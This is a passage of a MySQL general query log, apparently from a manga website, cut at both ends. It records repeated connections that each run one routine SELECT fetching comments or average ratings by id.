Query select * FROM comments where parent_id = '38' 330660438 Quit 330660439 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660439 Query select * FROM comments where parent_id = '39' 330660439 Quit 330660440 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660440 Query select * FROM comments where parent_id = '40' 330660440 Quit 330660441 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660441 Query select * FROM comments where parent_id = '41' 330660441 Quit 330660442 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660442 Query select * FROM comments where parent_id = '37' 330660442 Quit 330660443 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660443 Query select * FROM comments where parent_id = '36' 330660443 Quit 330660444 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660444 Query select * FROM comments where parent_id = '35' 330660444 Quit 330660445 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660445 Query select * FROM comments where parent_id = '30' 330660445 Quit 330660446 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660446 Query select * FROM comments where parent_id = '29' 330660446 Quit 330660447 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660447 Query select * FROM comments where parent_id = '28' 330660447 Quit 330660448 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660448 Query select * FROM comments where parent_id = '27' 330660448 Quit 330660449 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660449 Query select * FROM comments where parent_id = '26' 330660449 Quit 330660450 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660450 Query select * FROM comments where parent_id = '24' 330660450 Quit 330660451 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660451 Query select * FROM comments where parent_id = '20' 330660451 Quit 330660452 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660452 Query select * FROM comments where parent_id = '19' 330660452 Quit 330660453 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660453 Query select * FROM comments where parent_id = '17' 330660453 Quit 330660454 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660454 Query select * FROM comments where parent_id = '5' 330660454 Quit 330660455 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660455 Query select * FROM comments where parent_id = '4' 330660455 Quit 330660456 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660456 Query select * FROM comments where parent_id = '1' 330660456 Quit 330660457 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330660457 Quit 330660458 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330660458 Quit 330660459 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330660459 Quit 330660460 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330660460 Quit 330660461 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330660461 Quit 330660462 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330660462 Quit 330660463 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330660463 Quit 330660464 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330660464 Quit 330660465 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330660465 Quit 330660466 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330660466 Quit 330660467 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330660467 Quit 330660468 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330660468 Quit 330660469 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330660469 Quit 330660470 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330660470 Quit 330660471 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330660471 Quit 330660472 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330660472 Quit 330660473 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330660473 Quit 330660474 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330660474 Quit 330660475 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330660475 Quit 330660476 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330660476 Quit 330660477 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330660477 Quit 330660478 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330660478 Quit 330660479 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330660479 Quit 330660480 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330660480 Quit 330660481 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330660481 Quit 330660482 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330660482 Quit 330660483 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330660483 Quit 330660484 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330660484 Quit 330660485 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330660485 Quit 330660486 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330660486 Quit 330660487 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330660487 Quit 330660488 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330660488 Quit 330660489 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330660489 Quit 330660490 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330660490 Quit 330660491 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330660491 Quit 330660492 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330660492 Quit 330660493 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330660493 Quit 330660494 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330660494 Quit 330660495 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330660495 Quit 330660496 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330660496 Quit 330660497 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330660497 Quit 330660498 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330660498 Quit 330660499 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330660499 Quit 330660500 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330660500 Quit 330660501 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330660501 Quit 330660502 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330660502 Quit 330660503 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330660503 Quit 330660504 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330660504 Quit 330660505 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330660505 Quit 330660506 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330660506 Quit 330660507 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330660507 Quit 330660508 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330660508 Quit 330660509 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330660509 Quit 330660510 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330660510 Quit 330660511 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330660511 Quit 330660512 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330660512 Quit 330660513 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330660513 Quit 330660514 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330660514 Quit 330660515 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330660515 Quit 330660516 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330660516 Quit 330660517 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330660517 Quit 330660518 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330660518 Quit 330660519 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330660519 Quit 330660520 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330660520 Quit 330660521 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330660521 Quit 330660522 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330660522 Quit 330660523 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330660523 Quit 330660524 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330660524 Quit 330660525 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330660525 Quit 330660526 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330660526 Quit 330660527 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330660527 Quit 330660528 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330660528 Quit 330660529 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330660529 Quit 330660530 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330660530 Quit 330660531 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330660531 Quit 330660532 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330660532 Quit 330660533 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330660533 Quit 330660534 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330660534 Quit 330660535 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330660535 Quit 330660536 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330660536 Quit 330660537 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330660537 Quit 330660538 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330660538 Quit 330660539 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330660539 Quit 330660540 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330660540 Quit 330660541 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330660541 Quit 330660542 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330660542 Quit 330660543 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330660543 Quit 330660544 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330660544 Quit 330660545 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330660545 Quit 330660546 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330660546 Quit 330660547 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330660547 Quit 330660548 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330660548 Quit 330660549 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330660549 Quit 330660550 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330660550 Quit 330660551 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330660551 Quit 330660552 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330660552 Quit 330660553 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330660553 Quit 330660554 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330660554 Quit 330660555 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330660555 Quit 330660556 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330660556 Quit 330660557 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330660557 Quit 330660558 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330660558 Quit 330660559 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330660559 Quit 330660560 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330660560 Quit 330660561 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330660561 Quit 330660562 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330660562 Quit 330660563 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330660563 Quit 330660564 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330660564 Quit 330660565 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330660565 Quit 330660566 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330660566 Quit 330660567 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330660567 Quit 330660568 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330660568 Quit 330660569 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330660569 Quit 330660570 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330660570 Quit 330660571 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330660571 Quit 330660572 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330660572 Quit 330660573 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330660573 Quit 330660574 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330660574 Quit 330660575 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330660575 Quit 330660576 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330660576 Quit 330660577 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330660577 Quit 330660578 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330660578 Quit 330660579 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330660579 Quit 330660580 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330660580 Quit 330660581 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330660581 Quit 330660582 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330660582 Quit 330660583 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330660583 Quit 330660584 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330660584 Quit 330660585 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330660585 Quit 330660586 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330660586 Quit 330660587 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330660587 Quit 330660588 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330660588 Quit 330660589 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330660589 Quit 330660590 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330660590 Quit 330660591 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330660591 Quit 330660592 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330660592 Quit 330660593 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330660593 Quit 330660594 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330660594 Quit 330660595 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330660595 Quit 330660596 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330660596 Quit 330660597 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330660597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = 